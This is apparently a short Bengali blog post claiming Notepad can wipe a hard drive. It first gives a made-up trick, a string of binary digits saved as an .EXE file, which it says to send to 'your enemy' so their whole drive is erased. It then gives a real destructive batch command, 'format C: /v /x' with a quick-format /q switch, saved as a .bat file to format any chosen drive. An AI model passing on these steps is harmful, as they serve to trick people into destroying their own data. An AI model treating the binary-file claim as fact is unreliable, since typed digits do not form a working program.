স্পন্সরড এলার্ম


আমরা যদি নোটপ্যাড কে বেকার একটা সফ্টওয়ার ভাবি তাহলে আমি বলবো আমরা ভূল করি।কারণ নোটপ্যাড দিয়ে যে অনেক কিছু করা যায় খুব সহজে।আমরা জানিনা বলে আমাদের কাছে নোটপ্যাড কে বেকার মনে হয়। নোটপ্যাড খুব সহজে একটি HDD ফরম্যাট করা করা যায়।
কি ভাবে নোটপ্যাড দিয়ে একটি HDD ফরম্যাট করবেন ?
১. নতুন নোটপ্যাড ওপেন করুন।
২. নিচের কোডটি কপি পেষ্ট বা টাইপ করুন।
01001011000111110010010101010101010000011111100000
৩. এবার যে কোন নামের পর .EXE লিখে সেভ করুন।
৪. এবার এটা আপনার শত্রুকে পাঠিয়ে দিন এবং অপেক্ষা করুন কখন সে ফাইলটি ডাবল ক্লিক করে এবং তার সর্ম্পূণ HDD ফরম্যাট হওয়ার দুঃখে কাঁদতে বসে।শুধু মাত্র একটি ড্রাইভ ফরম্যাট করতে নিচে দেখুন –
Update
সি ড্রাইভ ফরম্যাট করতে – format C: /v /x লিখে যে কোন নামের পর.bat লিখে সেভ করুন।একই ভাবে অন্য ড্রাইভ ফরম্যাট করতে শুধু “C” এর জাগায় E.G.D.ইত্যাদি ব্যবহার করুন।
তাড়াতাড়ি ফরম্যাট করতে মাঝে /q যোগ করুন,যেমন – format C: /v /q /x
* /q তে দ্রুত ফরম্যাট,
* /v তে ভলিউম লেবেল,
* /x তে পার্টিশন ফরম্যাট হবে। (2163)